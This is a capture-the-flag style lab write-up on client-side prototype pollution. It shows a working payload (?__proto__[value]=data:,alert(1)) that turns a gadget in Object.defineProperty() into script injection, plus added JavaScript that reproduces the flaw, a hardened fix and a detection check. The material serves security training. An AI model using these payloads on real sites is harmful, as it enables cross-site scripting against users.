Lab: Client side prototype pollution via browser APIs
Find a prototype pollution source
After starting the exercise, the blog should look like the following illustration.

In our browser, we insert any property (/?__proto__[foo]=bar) at the end of the URL in the address line and confirm with ENTER. Our address line should look like this:
https://<YOUR-LAB-ID>.web-security-academy.net/?__proto__[foo]=bar

We now press the key combination CTRL + SHIFT + I to open the DevTools of the browser and switch to the Console tab.

In Console we now enter Object.prototype and study the properties of the returned object. We notice that the foo property we injected has been added. We have thus successfully found a source for the prototype pollution.

Identify a gadget
We open the Sources tab in DevTools and take a look at the loaded JavaScript files.

In the file searchLoggerConfigurable.js there is a function called searchLogger(). In this function we see the object config, which has a property called transport_url. This property is used to dynamically attach a script to the DOM. Since transport_url is defined as an own property of the config object, it does not at first appear to be vulnerable. Note that in the next line, the Object.defineProperty() method is used to make the transport_url property non-writable and non-configurable. Note, however, that no value property is defined in the descriptor object, so a value property inherited from Object.prototype would be used instead. The function is shown in the following code snippet:
async function searchLogger() {
    let config = {params: deparam(new URL(location).searchParams.toString()), transport_url: false};
    // make the 'transport_url' unwritable and unconfigurable.
    Object.defineProperty(config, 'transport_url', {configurable: false, writable: false});
    if(config.transport_url) {
        let script = document.createElement('script');
        script.src = config.transport_url;
        document.body.appendChild(script);
    }
    if(config.params && config.params.search) {
        await logQuery('/logger', config.params);
    }
}

Craft an exploit
We now use our identified prototype pollution source and adjust our payload:
/?__proto__[value]=foo

We paste the payload back into our address bar in the browser and confirm with ENTER. In the DevTools of the browser, we switch to the Elements tab and study the HTML code of the blog. We see that a <script> tag with src="foo" has been created.

We now adapt our payload in the URL and insert an XSS-PoC. For the PoC we use the data: URL. Our payload should now look like this:
https://<YOUR-LAB-ID>.web-security-academy.net/?__proto__[value]=data:,alert(1);

If we now confirm our input with ENTER, we receive a call to the function alert(1). We have now successfully completed this exercise.
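The following is an added example (not code from the lab or this write-up) that reproduces the gadget and the exploit from the two sections above in isolation, without a browser: Object.defineProperty() reads its descriptor argument like any other object, so a value field missing from the descriptor literal is looked up on Object.prototype, where the pollution source has planted it. It also shows the hardened form of the same call and a simple check for a polluted prototype; the polluted value is a constructed stand-in for the ?__proto__[value]= payload.

```javascript
// Constructed stand-in for what /?__proto__[value]=data:,alert(1) would plant.
const POLLUTED_VALUE = 'data:,alert(1)';

// Vulnerable pattern from the lab: the descriptor has no explicit 'value',
// so ToPropertyDescriptor() finds one on Object.prototype if it was polluted.
function vulnerableConfig() {
  const config = { transport_url: false };
  Object.defineProperty(config, 'transport_url', { configurable: false, writable: false });
  return config.transport_url;
}

// Hardened variant: the descriptor states 'value' itself, so the own property
// shadows anything inherited from Object.prototype.
function hardenedConfig() {
  const config = { transport_url: false };
  Object.defineProperty(config, 'transport_url', {
    value: config.transport_url, configurable: false, writable: false,
  });
  return config.transport_url;
}

// Detection helper: a polluted prototype shows up as an own property on
// Object.prototype, which a clean runtime never has for this name.
function isPrototypePolluted(name) {
  return Object.prototype.hasOwnProperty(name);
}

// Runs fn while Object.prototype.value is polluted, then restores the prototype
// so the rest of the process is unaffected.
function withPollutedPrototype(fn) {
  Object.prototype.value = POLLUTED_VALUE; // same effect as the __proto__[value] source
  try {
    return fn();
  } finally {
    delete Object.prototype.value;
  }
}

// Stand-alone demonstration.
console.log('clean:', vulnerableConfig());                              // false
console.log('polluted, vulnerable:', withPollutedPrototype(vulnerableConfig)); // data:,alert(1)
console.log('polluted, hardened:', withPollutedPrototype(hardenedConfig));     // false
console.log('polluted now?', isPrototypePolluted('value'));             // false
```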

